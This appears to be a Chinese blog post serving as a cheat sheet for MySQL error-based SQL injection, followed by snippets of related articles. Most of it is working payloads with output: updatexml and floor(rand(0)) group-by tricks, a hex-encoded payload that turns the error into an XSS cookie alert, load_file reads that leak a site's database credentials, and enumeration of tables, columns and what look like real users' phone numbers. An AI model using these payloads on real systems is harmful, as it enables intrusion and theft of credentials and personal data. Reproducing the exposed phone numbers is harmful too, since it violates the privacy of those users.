mysql基于“报错”的注入

报错是如何转为xss的？

mysql语句在页面报错，泄露信息
=========================================================================================================================================================================
*	报错方式之“updatexml”，有字数限制，但无需配合union。
	-	mysql> select updatexml(1, concat(‘:‘, ‘test‘), 1);
			ERROR 1105 (HY000): XPATH syntax error: ‘:test‘
	-	mysql> select updatexml(1, concat(0x3a, ‘test‘), 1);
			ERROR 1105 (HY000): XPATH syntax error: ‘:test‘
	-	mysql> select updatexml(1, concat(0x5e, ‘test‘), 1);
			ERROR 1105 (HY000): XPATH syntax error: ‘^test‘
	-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, ‘test‘),1);
			ERROR 1105 (HY000): XPATH syntax error: ‘^test‘
	**	将上面‘test’换成你的子查询语句或函数均可。

*	group by+rand(0)+having，无字数限制，无需配合union。
	-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);
			ERROR 1062 (23000): Duplicate entry ‘5.6.21-log~1‘ for key ‘group_key‘

*	报错方式之“rand+count+group by”，需配合union
	rand(0)无论在哪台机器运行多少次，生成的序列都是一样的
	参考mysql开发者社区曝光的bug http://bugs.mysql.com/bug.php?id=8652
	-	mysql>  select 1,2,count(*),concat(‘test‘, char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;
			ERROR 1062 (23000): Duplicate entry ‘test^1‘ for key ‘group_key‘
	-	mysql>  select 1,2,count(*),concat(‘test‘, char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
			ERROR 1062 (23000): Duplicate entry ‘test^0.7‘ for key ‘group_key‘
	**	将上面‘test’换成你的子查询语句或函数均可。

mysql转xss语句
	mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘/><img src="fuck" onerror=alert(document.cookie)>^0.7‘ for key ‘group_key‘

直接爆配置文件密码，前提是有file权限
	mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);
		ERROR 1105 (HY000): XPATH syntax error: ‘:	‘DB_NAME‘   => ‘fan******un‘,‘
	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);
		ERROR 1105 (HY000): XPATH syntax error: ‘:	‘DB_USER‘   => ‘s*********b‘, /‘
	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);
		ERROR 1105 (HY000): XPATH syntax error: ‘:PWD‘    => ‘hahahaahhah‘,‘

爆版本
	mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;
		ERROR 1062 (23000): Duplicate entry ‘5.6.21-log1‘ for key ‘group_key‘

爆库名
	mysql> select info();
		ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist
	mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘fangjiangjun^1‘ for key ‘group_key‘

爆表名
	mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘CHARACTER_SETS^1‘ for key ‘group_key‘
	mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘COLLATIONS^1‘ for key ‘group_key‘
	mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘COLLATION_CHARACTER_SET_APPLICABILITY^1‘ for key ‘group_key‘

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘f_admin^1‘ for key ‘group_key‘
	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema=‘fangjiangjun‘ limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘f_admin_role^1‘ for key ‘group_key‘

爆字段名
	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘id^1‘ for key ‘group_key‘
	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘login_time^1‘ for key ‘group_key‘

爆字段值
	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘18602029479^1‘ for key ‘group_key‘
	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry ‘15602267509^1‘ for key ‘group_key‘

时间： 2024-10-12 19:22:54

mysql基于“报错”的注入的相关文章

sql注入--基于报错的注入

这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学院的教程)基于报错的注入,如图,在数据库上测试,产生报错 http://localhost/sqlilabs/Less-5/index.php?id=3' and (select 1 from(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a

sqli-labs：1-4，基于报错的注入

sqli1: 脚本 1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 09:37:14 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/Less-1/?id=-1' 10 11 def Len_OrderBy(url): 12 pattern_mark

mysql编译报错

1.make报错现象 Warning: Bison executable not found in PATH 解决办法 yum -y install bison 2.make报错现象 ake Error at /usr/share/cmake-2.8/Modules/CMakeCXXInformation.cmake:17 (get_filename_component):get_filename_component called with incorrect number of argumen

mysql安装报错

如果编译时出现了以下错误:checking for tgetent in -ltermcap- nochecking for termcap functions library- configure: error: No curses/termcap library found说明 curses/termcap 库没有安装去下载一个ncurses-5.6.tar.gz,wget http://ftp.gnu.org/pub/gnu/ncurses/ncurses-5.6.tar.gztar zx

启动MYSQL 57 报错“The service MYSQL57 failed the most recent........等”的问题解决方式！

每天开机之后,启动MYSQL Notifier就报错,第一次出现重启电脑后解决,后面的几天老是出现,重启电脑好几次都没有解决,感觉很烦人,一定要搞定这个问题找到原因,于是有了下文....... 启动MYSQL 57报错信息"The service MYSQL57 failed the most recent status change request with the message time out has expired and the operation has not been comp

MySql启动报错,无法更新PID文件

MySql启动报错 Starting MySQL.. ERROR! The server quit without updating PID file (/var/lib/mysql..) 1,查看错误日志 2017-08-10 19:38:14 31865 [Note] InnoDB: Initializing buffer pool, size = 50.0M InnoDB: mmap(53657600 bytes) failed; errno 12 2017-08-10 19:38:14

MYSQL 内存报错 Use 'mysqld --thread_stack=#' to specify a bigger stack.

MYSQL 内存报错 Use 'mysqld --thread_stack=#' to specify a bigger stack. 今天在使用mysql的过程中,连接数据库始终无法成功最后发现是数据库无法执行增加修改的操作 :错误代码 Thread stack overrun: 11552 bytes used of a 131072 byte stack, and 128000 bytes needed. Use 'mysqld --thread_stack=#' to specif

PHP多次调用Mysql存储过程报错解决办法

PHP多次调用Mysql数据库的存储过程会出现问题,主要问题为存储过程中执行多次SQL语句不能一一释放导致的,网上找了一些解决办法,比如使用 multi_query 然后一个一个释放,但是发现根本不适合我们的项目,我们使用CI框架写的,更多的是使用CI的数据库处理方法.所以只能另辟蹊径. 一次偶然,把Mysql链接方式改成了mysqli,两种不同的PHP连接mysql的扩展,官方在高版本中推荐使用mysqli,结果却奇迹般好了,使用Mysql长连接也行,天意么? PHP多次调用Mysql存储过程

linux mysql启动报错Can't open and lock privilege tables: Table 'mysql.host' doesn't exist

vi /etc/my.cnf 查看日志文件路径: log-error=/var/log/mysqld.log 查看报错日志: 之前的服务器被别人拿了,所以自己买了台美国vps,根据笔记安装完启动mysql,又启动不了. 查看了错误日志引用 090321 18:55:03 mysqld_safe Starting mysqld daemon with databases from /usr/local/mysql/data /usr/local/mysql/libexec/mysqld: Ta